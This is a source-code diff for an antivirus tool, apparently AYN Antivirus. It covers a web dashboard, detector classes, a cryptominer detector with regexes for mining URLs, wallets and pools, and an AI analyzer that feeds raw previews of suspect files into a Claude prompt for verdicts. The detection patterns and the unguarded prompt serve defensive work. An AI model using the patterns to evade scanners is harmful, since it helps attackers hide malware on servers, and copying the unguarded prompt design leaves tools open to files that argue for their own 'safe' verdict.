if(ch&&ch.chart&&ch.chart.length)drawBarChart('scan-chart-canvas',ch.chart,{height:160});
}
/* ═══════ DEFINITIONS ═══════ */
Q('#def-subtabs .sub-tab').forEach(t=>t.addEventListener('click',()=>{
Q('#def-subtabs .sub-tab').forEach(x=>x.classList.remove('active'));
t.classList.add('active');S.defType=t.dataset.def;S.defPage=1;loadDefs();
}));
let _dTimer;$('def-search').oninput=()=>{clearTimeout(_dTimer);_dTimer=setTimeout(()=>{S.defPage=1;S.defSearch=$('def-search').value;loadDefs();},400);};
function defPage(d){S.defPage=Math.max(1,S.defPage+d);loadDefs();}
async function loadDefs(){
const typ=S.defType==='all'?'':S.defType;
const q=encodeURIComponent(S.defSearch||'');
const [dd,su]=await Promise.all([
api(`/api/definitions?type=${typ}&page=${S.defPage}&per_page=${S.defPerPage}&search=${q}`),
api('/api/sig-updates?limit=10')
]);
if(dd){
$('def-hashes').textContent=fmt(dd.total_hashes);
$('def-ips').textContent=fmt(dd.total_ips);
$('def-domains').textContent=fmt(dd.total_domains);
$('def-urls').textContent=fmt(dd.total_urls);
renderDefTable(dd);
const total=dd.total_hashes+dd.total_ips+dd.total_domains+dd.total_urls;
const pages=Math.max(Math.ceil(total/S.defPerPage),1);
$('def-page-info').textContent=`Page ${S.defPage} of ${pages}`;
}
if(su){
const tb=$('sigup-tbody');
const ups=su.updates||[];
if(!ups.length){tb.innerHTML='<tr class="empty-row"><td colspan="7">No updates yet</td></tr>';
}else{tb.innerHTML=ups.map(u=>`<tr><td>${ago(u.timestamp)}</td><td>${esc(u.feed_name)}</td><td>${fmt(u.hashes_added)}</td><td>${fmt(u.ips_added)}</td><td>${fmt(u.domains_added)}</td><td>${fmt(u.urls_added)}</td><td>${statusBadge(u.status)}</td></tr>`).join('');}
}
}
function renderDefTable(dd){
const th=$('def-thead');const tb=$('def-tbody');
let rows=[];const t=S.defType;
if(t==='all'||t==='hash'){
th.innerHTML='<tr><th>Hash</th><th>Threat Name</th><th>Type</th><th>Severity</th><th>Source</th><th>Date</th></tr>';
rows=rows.concat((dd.hashes||[]).map(r=>`<tr><td class="mono">${esc(trunc(r.hash,16))}</td><td>${esc(r.threat_name)}</td><td>${esc(r.threat_type)}</td><td>${sevBadge(r.severity)}</td><td>${esc(r.source)}</td><td>${ago(r.added_date)}</td></tr>`));
}
if(t==='all'||t==='ip'){
if(t==='ip')th.innerHTML='<tr><th>IP Address</th><th>Threat Name</th><th>Type</th><th>Source</th><th>Date</th></tr>';
rows=rows.concat((dd.ips||[]).map(r=>`<tr><td class="mono">${esc(r.ip)}</td><td>${esc(r.threat_name)}</td><td>${esc(r.type)}</td><td>${esc(r.source)}</td><td>${ago(r.added_date)}</td></tr>`));
}
if(t==='all'||t==='domain'){
if(t==='domain')th.innerHTML='<tr><th>Domain</th><th>Threat Name</th><th>Type</th><th>Source</th><th>Date</th></tr>';
rows=rows.concat((dd.domains||[]).map(r=>`<tr><td class="mono">${esc(r.domain)}</td><td>${esc(r.threat_name)}</td><td>${esc(r.type)}</td><td>${esc(r.source)}</td><td>${ago(r.added_date)}</td></tr>`));
}
if(t==='all'||t==='url'){
if(t==='url')th.innerHTML='<tr><th>URL</th><th>Threat Name</th><th>Type</th><th>Source</th><th>Date</th></tr>';
rows=rows.concat((dd.urls||[]).map(r=>`<tr><td class="mono trunc" title="${esc(r.url)}">${esc(trunc(r.url,60))}</td><td>${esc(r.threat_name)}</td><td>${esc(r.type)}</td><td>${esc(r.source)}</td><td>${ago(r.added_date)}</td></tr>`));
}
if(t==='all'&&!rows.length&&!dd.hashes?.length)th.innerHTML='<tr><th>Hash</th><th>Threat Name</th><th>Type</th><th>Severity</th><th>Source</th><th>Date</th></tr>';
tb.innerHTML=rows.length?rows.join(''):'<tr class="empty-row"><td colspan="6">No definitions found. Run an update to fetch threat feeds.</td></tr>';
}
/* ═══════ CONTAINERS ═══════ */
async function loadContainers(){
const [cl,cs]=await Promise.all([api('/api/containers'),api('/api/container-scan')]);
if(cl){
$('ct-count').textContent=fmt(cl.count);
$('ct-runtimes').textContent=cl.runtimes.length?cl.runtimes.join(', '):'None detected';
const tb=$('ct-tbody');
const cc=cl.containers||[];
if(!cc.length){tb.innerHTML='<tr class="empty-row"><td colspan="8">No containers found. Install Docker, Podman, or LXC.</td></tr>';
}else{
tb.innerHTML=cc.map(c=>{
const st=c.status==='running'?'<span class="badge badge-success">running</span>':c.status==='stopped'?'<span class="badge badge-error">stopped</span>':'<span class="badge badge-warning">'+esc(c.status)+'</span>';
const ports=(c.ports||[]).slice(0,3).join(', ')||(c.status==='running'?'':'');
return `<tr><td class="mono">${esc(trunc(c.container_id,12))}</td><td>${esc(c.name)}</td><td class="mono trunc" title="${esc(c.image)}">${esc(trunc(c.image,30))}</td><td>${esc(c.runtime)}</td><td>${st}</td><td class="mono">${esc(c.ip_address||'')}</td><td class="mono" style="font-size:.72rem">${esc(ports)}</td><td><button class="btn btn-sm" onclick="scanSingleContainer('${esc(c.container_id)}',this)">Scan</button></td></tr>`;
}).join('');
}
}
if(cs){
const threats=cs.threats||[];
$('ct-threats').textContent=fmt(threats.length);
const tb=$('ct-threat-tbody');
if(!threats.length){tb.innerHTML='<tr class="empty-row"><td colspan="6">No container threats ✅</td></tr>';
}else{tb.innerHTML=threats.map(t=>`<tr><td>${ago(t.timestamp)}</td><td>${esc(trunc(t.file_path,30))}</td><td>${esc(t.threat_name)}</td><td>${esc(t.threat_type)}</td><td>${sevBadge(t.severity)}</td><td class="trunc" title="${esc(t.details)}">${esc(trunc(t.details,60))}</td></tr>`).join('');}
}
}
async function scanSingleContainer(id,btn){
const orig=btn.innerHTML;btn.innerHTML='<span class="spinner"></span>';btn.disabled=true;
toast(`Scanning container ${id.slice(0,12)}…`,'info');
try{
const r=await fetch('/api/actions/scan-container',{method:'POST',headers:{'Content-Type':'application/json','X-API-Key':window.AYN_API_KEY||''},body:JSON.stringify({container_id:id})});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){const t=await r.text();toast('Server error: '+t.slice(0,100),'error');btn.innerHTML=orig;btn.disabled=false;return;}
const d=await r.json();
if(d.status==='error'){toast(d.error||'Failed','error');}
else{toast(`Container scan: ${d.threats_found||0} threats found`,'success');}
loadContainers();
}catch(e){toast('Failed: '+e.message,'error');}
btn.innerHTML=orig;btn.disabled=false;
}
/* ═══════ QUARANTINE ═══════ */
async function loadQuarantine(){
const d=await api('/api/quarantine');
if(!d)return;
$('q-count').textContent=fmt(d.count);
$('q-size').textContent=fmtBytes(d.total_size);
const tb=$('quar-tbody');
const items=d.items||[];
if(!items.length){tb.innerHTML='<tr class="empty-row"><td colspan="5">Vault is empty ✅</td></tr>';
}else{tb.innerHTML=items.map(i=>`<tr><td class="mono">${esc(trunc(i.id,12))}</td><td class="mono trunc" title="${esc(i.original_path)}">${esc(trunc(i.original_path,50))}</td><td>${esc(i.threat_name)}</td><td>${ago(i.quarantine_date)}</td><td>${fmtBytes(i.size||i.file_size||0)}</td></tr>`).join('');}
}
/* ═══════ LOGS ═══════ */
async function loadLogs(){
const d=await api('/api/logs?limit=50');
if(!d)return;
const lv=$('log-view');
const logs=d.logs||[];
if(!logs.length){lv.innerHTML='<div style="color:var(--text-dim);padding:12px">No activity yet.</div>';return;}
lv.innerHTML=logs.map(l=>{
const lc=l.level==='ERROR'?'var(--red)':l.level==='WARNING'?'var(--orange)':'var(--accent)';
return `<div class="log-line"><span class="log-ts">${l.timestamp||''}</span><span style="color:${lc};font-weight:700;min-width:56px">${l.level}</span><span class="log-src">${esc(l.source)}</span><span class="log-msg">${esc(l.message)}</span></div>`;
}).join('');
lv.scrollTop=0;
}
/* ═══════ AI ANALYSIS ═══════ */
async function aiAnalyze(threatId,btn){
const orig=btn.innerHTML;btn.innerHTML='<span class="spinner"></span> Analyzing…';btn.disabled=true;
try{
const r=await fetch('/api/actions/ai-analyze',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({threat_id:threatId})});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){toast('Server error','error');btn.innerHTML=orig;btn.disabled=false;return;}
const d=await r.json();
if(d.status==='ok'){
const emoji=d.verdict==='safe'?'':d.verdict==='threat'?'🚨':'⚠️';
const color=d.verdict==='safe'?'success':d.verdict==='threat'?'error':'info';
toast(`${emoji} AI: ${d.verdict.toUpperCase()} (${d.confidence}%) — ${d.reason}`,color);
if(d.verdict==='safe'){toast(`Recommended: ${d.recommended_action}`,'info');}
loadThreats();
} else {toast(d.error||'AI analysis failed','error');}
}catch(e){toast('Failed: '+e.message,'error');}
btn.innerHTML=orig;btn.disabled=false;
}
/* ═══════ THREAT ACTIONS ═══════ */
async function threatAction(action,threatId,filePath,threatName,btn){
const labels={'quarantine':'Quarantine','delete-threat':'Delete','whitelist':'Whitelist'};
if(action==='delete-threat'&&!confirm('Permanently delete '+filePath+'?'))return;
const orig=btn.parentElement.innerHTML;btn.parentElement.innerHTML='<span class="spinner"></span>';
try{
const body={threat_id:threatId};
if(filePath)body.file_path=filePath;
if(threatName)body.threat_name=threatName;
const r=await fetch('/api/actions/'+action,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(body)});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){toast('Server error','error');return;}
const d=await r.json();
if(d.status==='ok'){toast((labels[action]||action)+' done','success');loadThreats();}
else{toast(d.error||'Failed','error');}
}catch(e){toast('Failed: '+e.message,'error');}
}
/* ═══════ ACTIONS ═══════ */
async function doAction(action,btn){
const orig=btn.innerHTML;btn.innerHTML='<span class="spinner"></span> Running…';btn.disabled=true;
toast(`${action} started…`,'info');
try{
const r=await fetch(`/api/actions/${action}`,{method:'POST',headers:{'X-API-Key':window.AYN_API_KEY||''}});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){const t=await r.text();toast('Server error: '+(r.status>=400?r.status+' ':'')+t.slice(0,100),'error');btn.innerHTML=orig;btn.disabled=false;return;}
const d=await r.json();
if(d.status==='error'){toast(d.error||'Failed','error');}
else{toast(`${action} completed`,'success');}
refreshAll();
}catch(e){toast('Request failed: '+e.message,'error');}
btn.innerHTML=orig;btn.disabled=false;
}
async function doFeedUpdate(feed,btn){
const orig=btn.innerHTML;btn.innerHTML='<span class="spinner"></span>';btn.disabled=true;
toast(`Updating ${feed}…`,'info');
try{
const r=await fetch('/api/actions/update-feed',{method:'POST',headers:{'Content-Type':'application/json','X-API-Key':window.AYN_API_KEY||''},body:JSON.stringify({feed})});
const ct=r.headers.get('content-type')||'';
if(!ct.includes('application/json')){const t=await r.text();toast(`${feed}: Server error `+t.slice(0,100),'error');btn.innerHTML=orig;btn.disabled=false;return;}
const d=await r.json();
if(d.status==='error'){toast(`${feed}: ${d.error}`,'error');}
else{toast(`${feed} updated`,'success');}
loadDefs();
}catch(e){toast('Failed: '+e.message,'error');}
btn.innerHTML=orig;btn.disabled=false;
}
/* ═══════ REFRESH ═══════ */
async function refreshAll(){
await loadOverview();
const active=document.querySelector('.nav-tab.active');
if(active){
const tab=active.dataset.tab;
if(tab==='threats')loadThreats();
if(tab==='scans')loadScans();
if(tab==='definitions')loadDefs();
if(tab==='containers')loadContainers();
if(tab==='quarantine')loadQuarantine();
if(tab==='logs')loadLogs();
}
}
/* ── Boot ── */
refreshAll();
setInterval(refreshAll,30000);
</script>
</body>
</html>"""

View File

@@ -0,0 +1,20 @@
"""AYN Antivirus detector modules."""
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
from ayn_antivirus.detectors.rootkit_detector import RootkitDetector
from ayn_antivirus.detectors.signature_detector import SignatureDetector
from ayn_antivirus.detectors.spyware_detector import SpywareDetector
from ayn_antivirus.detectors.yara_detector import YaraDetector
__all__ = [
"BaseDetector",
"DetectionResult",
"CryptominerDetector",
"HeuristicDetector",
"RootkitDetector",
"SignatureDetector",
"SpywareDetector",
"YaraDetector",
]

View File

@@ -0,0 +1,268 @@
"""AYN Antivirus — AI-Powered Threat Analyzer.
Uses Claude to analyze suspicious files and filter false positives.
Each detection from heuristic/signature scanners is verified by AI
before being reported as a real threat.
"""
from __future__ import annotations
import json
import logging
import os
import platform
from dataclasses import dataclass
from pathlib import Path
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
SYSTEM_PROMPT = """Linux VPS antivirus analyst. {environment}
Normal: pip/npm scripts in /usr/local/bin, Docker hex IDs, cron jobs (fstrim/certbot/logrotate), high-entropy archives, curl/wget in deploy scripts, recently-modified files after apt/pip.
Reply ONLY JSON: {{"verdict":"threat"|"safe"|"suspicious","confidence":0-100,"reason":"short","recommended_action":"quarantine"|"delete"|"ignore"|"monitor"}}"""
ANALYSIS_PROMPT = """FILE:{file_path} DETECT:{threat_name}({threat_type}) SEV:{severity} DET:{detector} CONF:{original_confidence}% SIZE:{file_size} PERM:{permissions} OWN:{owner} MOD:{mtime}
PREVIEW:
{content_preview}
JSON verdict:"""
@dataclass
class AIVerdict:
"""Result of AI analysis on a detection."""
verdict: str # threat, safe, suspicious
confidence: int # 0-100
reason: str
recommended_action: str # quarantine, delete, ignore, monitor
raw_response: str = ""
@property
def is_threat(self) -> bool:
return self.verdict == "threat"
@property
def is_safe(self) -> bool:
return self.verdict == "safe"
class AIAnalyzer:
"""AI-powered threat analysis using Claude."""
def __init__(self, api_key: Optional[str] = None, model: str = "claude-sonnet-4-20250514"):
self._api_key = api_key or os.environ.get("ANTHROPIC_API_KEY", "") or self._load_key_from_env_file()
self._model = model
self._client = None
self._environment = self._detect_environment()
@staticmethod
def _load_key_from_env_file() -> str:
for p in ["/opt/ayn-antivirus/.env", Path.home() / ".ayn-antivirus" / ".env"]:
try:
for line in Path(p).read_text().splitlines():
line = line.strip()
if line.startswith("ANTHROPIC_API_KEY=") and not line.endswith("="):
return line.split("=", 1)[1].strip().strip("'\"")
except Exception:
pass
return ""
@property
def available(self) -> bool:
return bool(self._api_key)
def _get_client(self):
if not self._client:
try:
import anthropic
self._client = anthropic.Anthropic(api_key=self._api_key)
except Exception as exc:
logger.error("Failed to init Anthropic client: %s", exc)
return None
return self._client
@staticmethod
def _detect_environment() -> str:
"""Gather environment context for the AI."""
import shutil
parts = [
f"OS: {platform.system()} {platform.release()}",
f"Hostname: {platform.node()}",
f"Arch: {platform.machine()}",
]
if shutil.which("incus"):
parts.append("Container runtime: Incus/LXC (containers run Docker inside)")
if shutil.which("docker"):
parts.append("Docker: available")
if Path("/etc/dokploy").exists() or shutil.which("dokploy"):
parts.append("Platform: Dokploy (Docker deployment platform)")
# Check if we're inside a container
if Path("/run/host/container-manager").exists():
parts.append("Running inside: managed container")
return "\n".join(parts)
def _get_file_context(self, file_path: str) -> Dict[str, Any]:
"""Gather file metadata and content preview."""
p = Path(file_path)
ctx = {
"file_size": 0,
"permissions": "",
"owner": "",
"mtime": "",
"content_preview": "[file not readable]",
}
try:
st = p.stat()
ctx["file_size"] = st.st_size
ctx["permissions"] = oct(st.st_mode)[-4:]
ctx["mtime"] = str(st.st_mtime)
try:
import pwd
ctx["owner"] = pwd.getpwuid(st.st_uid).pw_name
except Exception:
ctx["owner"] = str(st.st_uid)
except OSError:
pass
try:
with open(file_path, "rb") as f:
raw = f.read(512)
# Try text decode, fall back to hex
try:
ctx["content_preview"] = raw.decode("utf-8", errors="replace")
except Exception:
ctx["content_preview"] = raw.hex()[:512]
except Exception:
pass
return ctx
def analyze(
self,
file_path: str,
threat_name: str,
threat_type: str,
severity: str,
detector: str,
confidence: int = 50,
) -> AIVerdict:
"""Analyze a single detection with AI."""
if not self.available:
# No API key — pass through as-is
return AIVerdict(
verdict="suspicious",
confidence=confidence,
reason="AI analysis unavailable (no API key)",
recommended_action="quarantine",
)
client = self._get_client()
if not client:
return AIVerdict(
verdict="suspicious",
confidence=confidence,
reason="AI client init failed",
recommended_action="quarantine",
)
ctx = self._get_file_context(file_path)
# Sanitize content preview to avoid format string issues
preview = ctx.get("content_preview", "")
if len(preview) > 500:
preview = preview[:500] + "..."
# Replace curly braces to avoid format() issues
preview = preview.replace("{", "{{").replace("}", "}}")
user_msg = ANALYSIS_PROMPT.format(
file_path=file_path,
threat_name=threat_name,
threat_type=threat_type,
severity=severity,
detector=detector,
original_confidence=confidence,
file_size=ctx.get("file_size", 0),
permissions=ctx.get("permissions", ""),
owner=ctx.get("owner", ""),
mtime=ctx.get("mtime", ""),
content_preview=preview,
)
text = ""
try:
response = client.messages.create(
model=self._model,
max_tokens=150,
system=SYSTEM_PROMPT.format(environment=self._environment),
messages=[{"role": "user", "content": user_msg}],
)
text = response.content[0].text.strip()
# Parse JSON from response (handle markdown code blocks)
if "```" in text:
parts = text.split("```")
for part in parts[1:]:
cleaned = part.strip()
if cleaned.startswith("json"):
cleaned = cleaned[4:].strip()
if cleaned.startswith("{"):
text = cleaned
break
# Find the JSON object in the response
start = text.find("{")
end = text.rfind("}") + 1
if start >= 0 and end > start:
text = text[start:end]
data = json.loads(text)
return AIVerdict(
verdict=data.get("verdict", "suspicious"),
confidence=data.get("confidence", 50),
reason=data.get("reason", ""),
recommended_action=data.get("recommended_action", "quarantine"),
raw_response=text,
)
except json.JSONDecodeError as exc:
logger.warning("AI returned non-JSON: %s — raw: %s", exc, text[:200])
return AIVerdict(
verdict="suspicious",
confidence=confidence,
reason=f"AI parse error: {text[:100]}",
recommended_action="quarantine",
raw_response=text,
)
except Exception as exc:
logger.error("AI analysis failed: %s", exc)
return AIVerdict(
verdict="suspicious",
confidence=confidence,
reason=f"AI error: {exc}",
recommended_action="quarantine",
)
def analyze_batch(
self,
detections: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
"""Analyze a batch of detections. Returns enriched detections with AI verdicts.
Each detection dict should have: file_path, threat_name, threat_type, severity, detector
"""
results = []
for d in detections:
verdict = self.analyze(
file_path=d.get("file_path", ""),
threat_name=d.get("threat_name", ""),
threat_type=d.get("threat_type", ""),
severity=d.get("severity", "MEDIUM"),
detector=d.get("detector", ""),
confidence=d.get("confidence", 50),
)
enriched = dict(d)
enriched["ai_verdict"] = verdict.verdict
enriched["ai_confidence"] = verdict.confidence
enriched["ai_reason"] = verdict.reason
enriched["ai_action"] = verdict.recommended_action
results.append(enriched)
return results

View File

@@ -0,0 +1,129 @@
"""Abstract base class and shared data structures for AYN detectors."""
from __future__ import annotations
import logging
from abc import ABC, abstractmethod
from dataclasses import dataclass, field
from pathlib import Path
from typing import List, Optional
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Detection result
# ---------------------------------------------------------------------------
@dataclass
class DetectionResult:
"""A single detection produced by a detector.
Attributes
----------
threat_name:
Short identifier for the threat (e.g. ``"Trojan.Miner.XMRig"``).
threat_type:
Category string — ``VIRUS``, ``MALWARE``, ``SPYWARE``, ``MINER``,
``ROOTKIT``, ``HEURISTIC``, etc.
severity:
One of ``CRITICAL``, ``HIGH``, ``MEDIUM``, ``LOW``.
confidence:
How confident the detector is in the finding (0100).
details:
Human-readable explanation.
detector_name:
Which detector produced this result.
"""
threat_name: str
threat_type: str
severity: str
confidence: int
details: str
detector_name: str
# ---------------------------------------------------------------------------
# Abstract base
# ---------------------------------------------------------------------------
class BaseDetector(ABC):
"""Interface that every AYN detector must implement.
Detectors receive a file path (and optionally pre-read content / hash)
and return zero or more :class:`DetectionResult` instances.
"""
# ------------------------------------------------------------------
# Identity
# ------------------------------------------------------------------
@property
@abstractmethod
def name(self) -> str:
"""Machine-friendly detector identifier."""
...
@property
@abstractmethod
def description(self) -> str:
"""One-line human-readable summary."""
...
# ------------------------------------------------------------------
# Detection
# ------------------------------------------------------------------
@abstractmethod
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Run detection logic against a single file.
Parameters
----------
file_path:
Path to the file on disk.
file_content:
Optional pre-read bytes of the file (avoids double-read).
file_hash:
Optional pre-computed SHA-256 hex digest.
Returns
-------
list[DetectionResult]
Empty list when the file is clean.
"""
...
# ------------------------------------------------------------------
# Helpers
# ------------------------------------------------------------------
def _read_content(
self,
file_path: Path,
file_content: Optional[bytes],
max_bytes: int = 10 * 1024 * 1024,
) -> bytes:
"""Return *file_content* if provided, otherwise read from disk.
Reads at most *max_bytes* to avoid unbounded memory usage.
"""
if file_content is not None:
return file_content
with open(file_path, "rb") as fh:
return fh.read(max_bytes)
def _log(self, msg: str, *args) -> None:
logger.info("[%s] " + msg, self.name, *args)
def _warn(self, msg: str, *args) -> None:
logger.warning("[%s] " + msg, self.name, *args)
def _error(self, msg: str, *args) -> None:
logger.error("[%s] " + msg, self.name, *args)

View File

@@ -0,0 +1,317 @@
"""Crypto-miner detector for AYN Antivirus.
Combines file-content analysis, process inspection, and network connection
checks to detect cryptocurrency mining activity on the host.
"""
from __future__ import annotations
import logging
import re
from pathlib import Path
from typing import List, Optional
import psutil
from ayn_antivirus.constants import (
CRYPTO_MINER_PROCESS_NAMES,
CRYPTO_POOL_DOMAINS,
HIGH_CPU_THRESHOLD,
SUSPICIOUS_PORTS,
)
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# File-content patterns
# ---------------------------------------------------------------------------
_RE_STRATUM = re.compile(rb"stratum\+(?:tcp|ssl|tls)://[^\s\"']+", re.IGNORECASE)
_RE_POOL_DOMAIN = re.compile(
rb"(?:" + b"|".join(re.escape(d.encode()) for d in CRYPTO_POOL_DOMAINS) + rb")",
re.IGNORECASE,
)
_RE_ALGO_REF = re.compile(
rb"\b(?:cryptonight|randomx|ethash|kawpow|equihash|scrypt|sha256d|x11|x13|lyra2rev2|blake2s)\b",
re.IGNORECASE,
)
_RE_MINING_CONFIG = re.compile(
rb"""["'](?:algo|pool|wallet|worker|pass|coin|url|user)["']\s*:\s*["']""",
re.IGNORECASE,
)
# Wallet address patterns (broad but useful).
_RE_BTC_ADDR = re.compile(rb"\b(?:1|3|bc1)[A-HJ-NP-Za-km-z1-9]{25,62}\b")
_RE_ETH_ADDR = re.compile(rb"\b0x[0-9a-fA-F]{40}\b")
_RE_XMR_ADDR = re.compile(rb"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b")
class CryptominerDetector(BaseDetector):
"""Detect cryptocurrency mining activity via files, processes, and network."""
# ------------------------------------------------------------------
# BaseDetector interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "cryptominer_detector"
@property
def description(self) -> str:
return "Detects crypto-mining binaries, configs, processes, and network traffic"
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> List[DetectionResult]:
"""Analyse a file for mining indicators.
Also checks running processes and network connections for live mining
activity (these are host-wide and not specific to *file_path*, but
are included for a comprehensive picture).
"""
file_path = Path(file_path)
results: List[DetectionResult] = []
try:
content = self._read_content(file_path, file_content)
except OSError as exc:
self._warn("Cannot read %s: %s", file_path, exc)
return results
# --- File-content checks ---
results.extend(self._check_stratum_urls(file_path, content))
results.extend(self._check_pool_domains(file_path, content))
results.extend(self._check_algo_references(file_path, content))
results.extend(self._check_mining_config(file_path, content))
results.extend(self._check_wallet_addresses(file_path, content))
return results
# ------------------------------------------------------------------
# File-content checks
# ------------------------------------------------------------------
def _check_stratum_urls(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_STRATUM.findall(content)
if matches:
urls = [m.decode(errors="replace") for m in matches[:5]]
results.append(DetectionResult(
threat_name="Miner.Stratum.URL",
threat_type="MINER",
severity="CRITICAL",
confidence=95,
details=f"Stratum mining URL(s) found: {', '.join(urls)}",
detector_name=self.name,
))
return results
def _check_pool_domains(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_POOL_DOMAIN.findall(content)
if matches:
domains = sorted(set(m.decode(errors="replace") for m in matches))
results.append(DetectionResult(
threat_name="Miner.PoolDomain",
threat_type="MINER",
severity="HIGH",
confidence=90,
details=f"Mining pool domain(s) referenced: {', '.join(domains[:5])}",
detector_name=self.name,
))
return results
def _check_algo_references(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_ALGO_REF.findall(content)
if matches:
algos = sorted(set(m.decode(errors="replace").lower() for m in matches))
results.append(DetectionResult(
threat_name="Miner.AlgorithmReference",
threat_type="MINER",
severity="MEDIUM",
confidence=60,
details=f"Mining algorithm reference(s): {', '.join(algos)}",
detector_name=self.name,
))
return results
def _check_mining_config(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
matches = _RE_MINING_CONFIG.findall(content)
if len(matches) >= 2:
results.append(DetectionResult(
threat_name="Miner.ConfigFile",
threat_type="MINER",
severity="HIGH",
confidence=85,
details=(
f"File resembles a mining configuration "
f"({len(matches)} config key(s) detected)"
),
detector_name=self.name,
))
return results
def _check_wallet_addresses(
self, file_path: Path, content: bytes
) -> List[DetectionResult]:
results: List[DetectionResult] = []
wallets: List[str] = []
for label, regex in [
("BTC", _RE_BTC_ADDR),
("ETH", _RE_ETH_ADDR),
("XMR", _RE_XMR_ADDR),
]:
matches = regex.findall(content)
for m in matches[:3]:
wallets.append(f"{label}:{m.decode(errors='replace')[:20]}")
if wallets:
results.append(DetectionResult(
threat_name="Miner.WalletAddress",
threat_type="MINER",
severity="HIGH",
confidence=70,
details=f"Cryptocurrency wallet address(es): {', '.join(wallets[:5])}",
detector_name=self.name,
))
return results
# ------------------------------------------------------------------
# Process-based detection (host-wide, not file-specific)
# ------------------------------------------------------------------
@staticmethod
def find_miner_processes() -> List[DetectionResult]:
"""Scan running processes for known miner names.
This is a host-wide check and should be called independently from
the per-file ``detect()`` method.
"""
results: List[DetectionResult] = []
for proc in psutil.process_iter(["pid", "name", "cmdline", "cpu_percent"]):
try:
info = proc.info
pname = (info.get("name") or "").lower()
cmdline = " ".join(info.get("cmdline") or []).lower()
for miner in CRYPTO_MINER_PROCESS_NAMES:
if miner in pname or miner in cmdline:
results.append(DetectionResult(
threat_name=f"Miner.Process.{miner}",
threat_type="MINER",
severity="CRITICAL",
confidence=95,
details=(
f"Known miner process running: {info.get('name')} "
f"(PID {info['pid']}, CPU {info.get('cpu_percent', 0):.1f}%)"
),
detector_name="cryptominer_detector",
))
break
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return results
# ------------------------------------------------------------------
# CPU analysis (host-wide)
# ------------------------------------------------------------------
@staticmethod
def find_high_cpu_processes(
threshold: float = HIGH_CPU_THRESHOLD,
) -> List[DetectionResult]:
"""Flag processes consuming CPU above *threshold* percent."""
results: List[DetectionResult] = []
for proc in psutil.process_iter(["pid", "name", "cpu_percent"]):
try:
info = proc.info
cpu = info.get("cpu_percent") or 0.0
if cpu > threshold:
results.append(DetectionResult(
threat_name="Miner.HighCPU",
threat_type="MINER",
severity="HIGH",
confidence=55,
details=(
f"Process {info.get('name')} (PID {info['pid']}) "
f"using {cpu:.1f}% CPU"
),
detector_name="cryptominer_detector",
))
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
continue
return results
# ------------------------------------------------------------------
# Network detection (host-wide)
# ------------------------------------------------------------------
@staticmethod
def find_mining_connections() -> List[DetectionResult]:
"""Check active network connections for mining pool traffic."""
results: List[DetectionResult] = []
try:
connections = psutil.net_connections(kind="inet")
except psutil.AccessDenied:
logger.warning("Insufficient permissions to read network connections")
return results
for conn in connections:
raddr = conn.raddr
if not raddr:
continue
remote_ip = raddr.ip
remote_port = raddr.port
proc_name = ""
if conn.pid:
try:
proc_name = psutil.Process(conn.pid).name()
except (psutil.NoSuchProcess, psutil.AccessDenied):
proc_name = "?"
if remote_port in SUSPICIOUS_PORTS:
results.append(DetectionResult(
threat_name="Miner.Network.SuspiciousPort",
threat_type="MINER",
severity="HIGH",
confidence=75,
details=(
f"Connection to port {remote_port} "
f"({remote_ip}, process={proc_name}, PID={conn.pid})"
),
detector_name="cryptominer_detector",
))
for domain in CRYPTO_POOL_DOMAINS:
if domain in remote_ip:
results.append(DetectionResult(
threat_name="Miner.Network.PoolConnection",
threat_type="MINER",
severity="CRITICAL",
confidence=95,
details=(
f"Active connection to mining pool {domain} "
f"({remote_ip}:{remote_port}, process={proc_name})"
),
detector_name="cryptominer_detector",
))
break
return results

View File

@@ -0,0 +1,436 @@
"""Heuristic detector for AYN Antivirus.
Uses statistical and pattern-based analysis to flag files that *look*
malicious even when no signature or YARA rule matches. Checks include
Shannon entropy (packed/encrypted binaries), suspicious string patterns,
obfuscation indicators, ELF anomalies, and permission/location red flags.
"""
from __future__ import annotations
import logging
import math
import re
import stat
from collections import Counter
from datetime import datetime, timedelta
from pathlib import Path
from typing import List, Optional
from ayn_antivirus.constants import SUSPICIOUS_EXTENSIONS
from ayn_antivirus.detectors.base import BaseDetector, DetectionResult
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Thresholds
# ---------------------------------------------------------------------------
_HIGH_ENTROPY_THRESHOLD = 7.5 # bits per byte — likely packed / encrypted
_CHR_CHAIN_MIN = 6 # minimum chr()/\xNN sequence length
_B64_MIN_LENGTH = 40 # minimum base64 blob considered suspicious
# ---------------------------------------------------------------------------
# Compiled regexes (built once at import time)
# ---------------------------------------------------------------------------
_RE_BASE64_BLOB = re.compile(
rb"(?:(?:[A-Za-z0-9+/]{4}){10,})(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?"
)
_RE_EVAL_EXEC = re.compile(rb"\b(?:eval|exec|compile)\s*\(", re.IGNORECASE)
_RE_SYSTEM_CALL = re.compile(
